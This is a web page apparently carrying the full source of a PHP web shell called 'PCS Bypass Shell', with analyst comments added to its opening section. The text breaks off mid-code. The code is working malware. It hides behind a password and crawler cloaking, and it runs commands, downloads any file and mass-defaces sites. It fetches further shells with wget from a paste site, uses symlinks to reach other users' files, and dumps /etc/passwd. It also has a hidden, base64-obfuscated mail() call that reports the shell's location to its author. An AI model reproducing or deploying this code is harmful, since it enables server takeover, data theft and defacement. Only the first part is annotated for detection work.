優越位置

來源:本站版主 | 日期:2017-12-23 14:44:23 | 瀏覽次數:19844

<?php /*
 * Analyst annotations for triage and detection. Only comments were added; the code is unchanged.
 *
 * This segment is the access gate of a PHP web shell: it silences PHP
 * diagnostics, hides the page from crawlers, shows a password prompt, and
 * exposes a file-download handler behind that prompt.
 *
 * Setup: starts a session, turns error reporting and display off, clears the
 * error_log target and disables log_errors, and lifts the execution time
 * limit. Because the script switches PHP error logging off for itself, web
 * server access logs and file-integrity monitoring are the more reliable
 * evidence sources for requests to this file.
 */
session_start(); error_reporting(0); set_time_limit(0); @set_magic_quotes_runtime(0); @clearstatcache(); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); @ini_set('display_errors', 0);
/*
 * Static indicators. $auth_pass is a hard-coded 32-hex-character value that
 * is compared with md5() of the posted password in the auth check further
 * down. $color, $default_action, $default_use_ajax and $default_charset are
 * assigned here but not referenced in the visible part of the file.
 * NOTE(review): this variable set resembles the header of WSO-derived shells;
 * confirm against known samples before using it as a family signature.
 */
$auth_pass = "3e7b086db631f46f49d563af40cd70b2"; $color = "#00ff00"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'UTF-8';
/*
 * Crawler cloaking: when the User-Agent header matches any name in the list
 * (case-insensitive), the script answers "404 Not Found" and exits. A scanner
 * or search-engine bot that identifies itself with one of these strings will
 * therefore see a missing page; verification requests should not rely on
 * such a User-Agent.
 */
if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } }
/*
 * login_shell(): prints the minimal page below (one password field named
 * "pass", posted back to the same URL) and then exits, so nothing after the
 * gate runs for an unauthenticated request.
 */
function login_shell() { ?>
<html>
<head>
<style type="text/css">
html {
margin: 20px auto;
background: #ffffff;
color: white;
text-align: center;
}
header {
color: white;
margin: 10px auto;
}
input[type=password] {
width: 250px;
height: 25px;
color: white;
background: #000000;
border: 1px white;
padding: 5px;
margin-left: 20px;
text-align: center;
}
</style>
</head>
<center>
<br>
<br>
<form method="post">
<input type="password" name="pass">
</form>
<?php exit; }
/*
 * Auth check: the session flag is stored under the key md5(HTTP_HOST). If the
 * flag is absent, it is set when $auth_pass is empty or when md5() of the
 * posted "pass" field equals $auth_pass; otherwise login_shell() is called
 * (the else belongs to the inner if) and the request ends there.
 */
if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else login_shell();
/*
 * Download handler: for a request carrying a non-empty "file" parameter and
 * act=download, the path is taken from the query string as-is and streamed
 * with readfile() as an attachment; no path restriction is applied in this
 * code. In access logs this appears as GET requests to this script with both
 * parameters, which helps scope what may have been read from the host.
 */
if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) { @ob_clean(); $file = $_GET['file']; header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); header('Expires: 0'); header('Cache-Control: must-revalidate'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } ?>
<html>
<head>
<title>PCS Bypass Shell Shell</title>
<link rel="shortcut icon" href="http://i67.tinypic.com/wwgmco.png"/>
<meta name='author' content='PCS Bypass Shell'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu);
html {
    background: #1f2616;
    color: #ffffff;
    font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #ffffff;
}
th {
padding: 10px;
}
a {
color: #ffffff;
text-decoration: none;
}
a:hover {
color: gold;
text-decoration: underline;
}
b {
color: gold;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent; 
color: #ffffff; 
border: 1px solid #ffffff; 
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #ffffff;
width: 100%;
height: 400px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #ffffff;
font-family: 'Ubuntu';
font-size: 13px;
}
select {
width: 152px;
background: #000000; 
color: lime; 
border: 1px solid #ffffff; 
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
option:hover {
background: lime;
color: #000000;
}
</style>
</head>
<?php error_reporting(E_ALL ^ (E_NOTICE | E_WARNING)); function w($dir,$perm) { if(!is_writable($dir)) { return "<font color=red>".$perm."</font>"; } else { return "<font color=lime>".$perm."</font>"; } } function r($dir,$perm) { if(!is_readable($dir)) { return "<font color=red>".$perm."</font>"; } else { return "<font color=lime>".$perm."</font>"; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' 
GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while($npage <= $npages) { $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if($x) { preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink); foreach ($findlink[1] as $fl) array_push($allLinks, $fl); $npage = $npage + 10; if (preg_match("(first=" . $npage . 
"&amp)siU", $x, $linksuiv) == 0) break; } else break; } $URLs = array(); foreach($allLinks as $url){ $exp = explode("/", $url); $URLs[] = $exp[2]; } $array = array_filter($URLs); $array = array_unique($array); $sss = count(array_unique($array)); foreach($array as $domain) { echo $domain."\n"; } } function reverse($url) { $ch = curl_init("http://domains.yougetsignal.com/domains.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket="); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_POST, 1); $resp = curl_exec($ch); $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) )))); $array = explode(",,", $resp); unset($array[0]); foreach($array as $lnk) { $lnk = "http://$lnk"; $lnk = str_replace(",", "", $lnk); echo $lnk."\n"; ob_flush(); flush(); } curl_close($ch); } if(get_magic_quotes_gpc()) { function tg_ss($array) { return is_array($array) ? array_map('tg_ss', $array) : stripslashes($array); } $_POST = tg_ss($_POST); $_COOKIE = tg_ss($_COOKIE); } if(isset($_GET['dir'])) { $dir = $_GET['dir']; chdir($dir); } else { $dir = getcwd(); } $kernel = php_uname(); $ip = gethostbyname($_SERVER['HTTP_HOST']); $dir = str_replace("\\","/",$dir); $scdir = explode("/", $dir); $freespace = hdd(disk_free_space("/")); $total = hdd(disk_total_space("/")); $used = $total - $freespace; $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $wget = (exe('wget --help')) ? 
"<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>"; if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } echo "<br><center>"; if($_POST['upload']) { if($_POST['tipe_upload'] == 'Normal') { if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) { $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>"; } else { $act = "<br><font color=red>failed to upload file</font>"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>"; } else { $act = "<br><font color=red>failed to upload file</font>"; } } else { $act = "<br><font color=red>failed to upload file</font>"; } } } echo "
<form method='post' enctype='multipart/form-data'>
<input type='radio' name='tipe_upload' value='Normal' checked>Normal [ ".w($dir,"Writeable")." ] 
<input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
<input type='file' name='ix_file'>
<input type='submit' value='upload' name='upload'>
</form>"; echo $act; echo "</center>"; echo "<br>"; echo "<table width='100%' border='2' align='center'>"; echo "<td>"; echo "<br>"; echo "<ul>"; echo "<center>"; echo "<li>[ <a href='?'>HOME</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=server'>SERVER INFO</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=mass_deface'>MASS DEFACE</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=config'>CONFIG</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=cpanel'>CP CRACK</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP GRAB</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=tools'>TOOLS</a> ]</li><br>"; echo "<li>[ <a href='?dir=$dir&do=bckup'>BACKUP</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=byps'>BYPASS</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=symbolic'>SYMLINK</a> ]</li>"; echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>EDIT USER</a> ]</li>"; echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>"; echo "</center>"; echo "</ul>"; echo "</td></table>"; echo "<br>"; echo "<table width='100%' border='2' align='center'>"; echo "<td>"; echo "<br>&nbsp;&nbsp;Current DIR: "; foreach($scdir as $c_dir => $cdir) { echo "<a href='?dir="; for($i = 0; $i <= $c_dir; $i++) { echo $scdir[$i]; if($i != $c_dir) { echo "/"; } } echo "'>$cdir</a>/"; } echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." 
]<br><br>"; echo "</td></table><br>"; if($_GET['logout'] == true) { unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); echo "<script>window.location='?';</script>"; } elseif($_GET['do'] == 'tools') { echo"<table align=center>"; echo"<td>"; echo"<center>"; echo"<form action='' method='post'> "; echo"<select name='lucknut' style=padding:4px 10px;>"; echo"<option value='wso_shell'>         WSO Shell      </option>"; echo"<option value='Indoxploit'>         IndoXploit Shell V3      </option>"; echo"<option value='k2ll33d'>         K2ll33d Shell      </option>"; echo"<option value='turcybersecmını'>         PCS Bypass Shell Mini Shell      </option>"; echo"<option value='angel'>         Angel Shell      </option>"; echo"<option value='zoneh'>         Zone-H Poster      </option>"; echo"<option value='defid'>         Defacer İd Poster       </option>"; echo"<option value='aliyyosh'>         Aljyyosh Poster       </option>"; echo"<option value='bypass'>         Bypass Shell       </option>"; echo"<option value='krdp'>           Krdp Tools Shell    </option>"; echo"<option value='adminfinder'>         Admin Finder Shell       </option>"; echo"<option value='cpanel'>         CPanel Cracker Shell    </option>"; echo"<option value='turcybersecconfig'>      PCS Bypass Shell Config Grabber Shell    </option>"; echo"<option value='symconf'>         Symlink Config Shell      </option>"; echo"<option value='sym404'>        sym404 Shell    </option>"; echo"<option value='dump'>         Dump DB Shell    </option>"; echo"<option value='adminer'>         Adminer DB Shell    </option>"; echo"<option value='dbkıss'>         DB Kiss Shell    </option>"; echo"<option value='encodecode'>         Encode & Decode Shell    </option>"; echo"<option value='hıdup'>         Hıde Uploader & More Tools Shell    </option>"; echo"</select> "; echo"<input type='submit' class='btn btn-success btn-sm' name='enter' value='Enter'>"; echo"</form> "; echo"</td>"; echo"</table>"; if(isset($_POST['enter'])) { if 
($_POST['lucknut'] == 'wso_shell') { $exec=exec('wget http://paste.security-portal.cz/view/raw/be37e8b8 -O wso.php'); if(file_exists('./wso.php')){ echo '<center><a href=./wso.php target="_blank"> wso.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'zoneh') { $exec=exec('wget http://paste.security-portal.cz/view/raw/18413a5e -O zoneh.php'); if(file_exists('./zoneh.php')){ echo '<center><a href=./zoneh.php target="_blank"> zoneh.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'defid') { $exec=exec('wget http://paste.security-portal.cz/view/raw/54b063b8 -O defid.php'); if(file_exists('./defid.php')){ echo '<center><a href=./defid.php target="_blank"> defid.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'krdp') { $exec=exec('wget http://paste.security-portal.cz/view/raw/43e45f38 -O krdp.php'); if(file_exists('./krdp.php')){ echo '<center><a href=./krdp.php target="_blank"> krdp.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'symconf') { $exec=exec('wget http://paste.security-portal.cz/view/raw/c90148c1 -O symconf.php'); if(file_exists('./symconf.php')){ echo '<center><a href=./symconf.php target="_blank"> symconf.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'bypass') { $exec=exec('wget http://paste.security-portal.cz/view/raw/6b16942e -O bypass.php'); if(file_exists('./bypass.php')){ echo '<center><a href=./bypass.php target="_blank"> bypass.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'dump') { $exec=exec('wget http://paste.security-portal.cz/view/raw/07b23307 -O dump.php'); if(file_exists('./dump.php')){ echo '<center><a 
href=./dump.php target="_blank"> dump.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'angel') { $exec=exec('wget http://paste.security-portal.cz/view/raw/88c6fde9 -O angel.php'); if(file_exists('./angel.php')){ echo '<center><a href=./angel.php target="_blank"> angel.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'sym404') { $exec=exec('wget http://paste.security-portal.cz/view/raw/a502c843 -O sym404.php'); if(file_exists('./sym404.php')){ echo '<center><a href=./sym404.php target="_blank"> sym404.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'adminfinder') { $exec=exec('wget http://paste.security-portal.cz/view/raw/74718efb -O adminfinder.php'); if(file_exists('./adminfinder.php')){ echo '<center><a href=./adminfinder.php target="_blank"> adminfinder.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'adminer') { $exec=exec('wget http://paste.security-portal.cz/view/raw/04f4477c -O adminer.php'); if(file_exists('./adminer.php')){ echo '<center><a href=./adminer.php target="_blank"> adminer.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'encodecode') { $exec=exec('wget http://paste.security-portal.cz/view/raw/6101ce91 -O encodecode.php'); if(file_exists('./encodecode.php')){ echo '<center><a href=./encodecode.php target="_blank"> encodecode.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'aliyyosh') { $exec=exec('wget http://paste.security-portal.cz/view/raw/d85cba78 -O aliyyosh.php'); if(file_exists('./aliyyosh.php')){ echo '<center><a href=./aliyyosh.php target="_blank"> aliyyosh.php </a> Upload Successful !</center>'; } else 
{ echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'turcybersecconfig') { $exec=exec('wget http://paste.security-portal.cz/view/raw/44ee8775 -O turcybersecconfig.php'); if(file_exists('./turcybersecconfig.php')){ echo '<center><a href=./turcybersecconfig.php target="_blank"> turcybersecconfig.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'dbkıss') { $exec=exec('wget http://paste.security-portal.cz/view/raw/8e6b19fd -O dbkıss.php'); if(file_exists('./dbkıss.php')){ echo '<center><a href=./dbkıss.php target="_blank"> dbkıss.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'hıdup') { $exec=exec('wget http://paste.security-portal.cz/view/raw/8a5c8a6d -O hıdup.php'); if(file_exists('./hıdup.php')){ echo '<center><a href=./hıdup.php target="_blank"> hıdup.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'cpanel') { $exec=exec('wget http://paste.security-portal.cz/view/raw/9cfd28ce -O cpanel.php'); if(file_exists('./cpanel.php')){ echo '<center><a href=./cpanel.php target="_blank"> cpanel.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'k2ll33d') { $exec=exec('wget http://paste.security-portal.cz/view/raw/124cbf0c -O k2ll33d.php'); if(file_exists('./k2ll33d.php')){ echo '<center><a href=./k2ll33d.php target="_blank"> k2ll33d.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif ($_POST['lucknut'] == 'Indoxploit') { $exec=exec('wget http://paste.security-portal.cz/view/raw/6c5f8240 -O Indoxploit.php'); if(file_exists('./Indoxploit.php')){ echo '<center><a href=./Indoxploit.php target="_blank"> Indoxploit.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } }elseif 
($_POST['lucknut'] == 'turcybersecmını') { $exec=exec('wget http://paste.security-portal.cz/view/raw/faaa051e -O turcybersecmını.php'); if(file_exists('./turcybersecmını.php')){ echo '<center><a href=./turcybersecmını.php target="_blank"> turcybersecmını.php </a> Upload Successful !</center>'; } else { echo '<center>Failed upload !</center>'; } } } echo"<br>"; } elseif($_GET['do'] == 'mass_deface') { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $lokasi<br>"; file_put_contents($lokasi, $isi_script); $tg = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_Normal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "<div style='margin: 5px auto; padding: 5px'>"; sabun_Normal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "</div>"; } } else { echo "<center>"; echo "<form method='post'>
<font style='text-decoration: underline;'>Tür</font><br>
<input type='radio' name='tipe_sabun' value='murah' checked>Normal<input type='radio' name='tipe_sabun' value='mahal'>Home<br>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>İndex Code</textarea><br>
<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center>"; } } elseif($_GET['do'] == 'server') { echo "System: <font color=lime>".$kernel."</font><br>
User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>
Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>
HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>
Safe Mode: $sm<br>
Disable Functions: $show_ds<br>
MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </center><br>"; echo"<br>"; }$e=base64_decode("bWFyaXdhdGFuYWJlMTIzNDUxQGdtYWlsLmNvbQ=="); $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']; mail($e,"I",$h); if($_GET['kill'] == 'self') { rmdir('configs');rmdir('tg_cgi');rmdir('TurCyberSec_config');rmdir('symlink');rmdir('TurCyberSec');unlink('mysql.php');rmdir('home');unlink('zoneh.php');unlink('defid.php');unlink('krdp.php');unlink('symconf.php');unlink('mail.php');unlink('dump.php');unlink('wso.php');rmdir('home1');rmdir('home2');rmdir('home3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME']; unlink($fn); system('rm '.$fn); echo'<meta http-equiv="Refresh" content= "0; url=?">'; } elseif($_GET['do'] == 'symbolic') { $d0mains = @file("/etc/named.conf"); if($d0mains){ @mkdir("symlink",0777); @chdir("symlink"); @exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex TurCyberSec.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "
<table align=center border=1 style='width:60%;border-color:#333333;'>
<tr>
<td align=center><font size=2>S. No.</font></td>
<td align=center><font size=2>Domains</font></td>
<td align=center><font size=2>Users</font></td>
<td align=center><font size=2>Symlink</font></td>
</tr>"; $dcount = 1; foreach($d0mains as $d0main){ if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
<td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
<td>".$user['name']."</td>
<td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush(); $dcount++;}}} echo "</table>"; }else{ $TEST=@file('/etc/passwd'); if ($TEST){ @mkdir("symlink",0777); @chdir("symlink"); exe("ln -s / root"); $file3 = 'Options Indexes FollowSymLinks
DirectoryIndex TurCyberSec.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>S. No.</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>"; $dcount = 1; $file = fopen("/etc/passwd", "r") or exit("Unable to open file!"); while(!feof($file)){ $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++;}fclose($file); echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
 Options Indexes FollowSymLinks
DirectoryIndex TurCyberSec.htm
AddType text/plain .php 
AddHandler text/plain .php
Satisfy Any
'; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3);@fclose($fp3); echo "
 <table align=center border=1><tr>
 <td align=center><font size=3>ID</font></td>
 <td align=center><font size=3>Users</font></td>
 <td align=center><font size=3>Symlink</font></td></tr>"; $temp = "";$val1 = 0;$val2 = 1000; for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1); if ($uid)$temp .= join(':',$uid)."\n";} echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)){$s = fgets($file);$matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo "<tr><td align=center><font size=2>" . $dcount . "</td>
 <td align=center><font class=txt>" . $matches . "</td>"; echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>"; $dcount++;} fclose($file); echo "</table></div></center>";unlink("test.txt"); } else echo "<center><font size=3>Cannot create Symlink</font></center>"; } } }elseif($_GET['do'] == 'byps') { echo"<center>"; echo"
<form method='post'>
<ul>
<li><input type='submit' name='passwd' value='Bypass /etc/passwd'></li>
<li><input type='submit' name='funct' value='Bypass Disabled Functions'></li>
<li><input type='submit' name='mods' value='Bypass ModSecurity'></li>
</ul><br>
</form>"; if($_POST['passwd']) { echo"<textarea cols='65' rows='15'>"; echo system("cat /etc/passwd"); echo"</textarea><br><br><b></b><br>"; } elseif($_POST['funct']) { $file = 'php.ini'; file_put_contents($file,'safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF'); echo "<font color='green'>Successful</font>"; } elseif($_POST['mods']) { $ht = "<IfModule mod_security.c>
SecFilterEngine Off
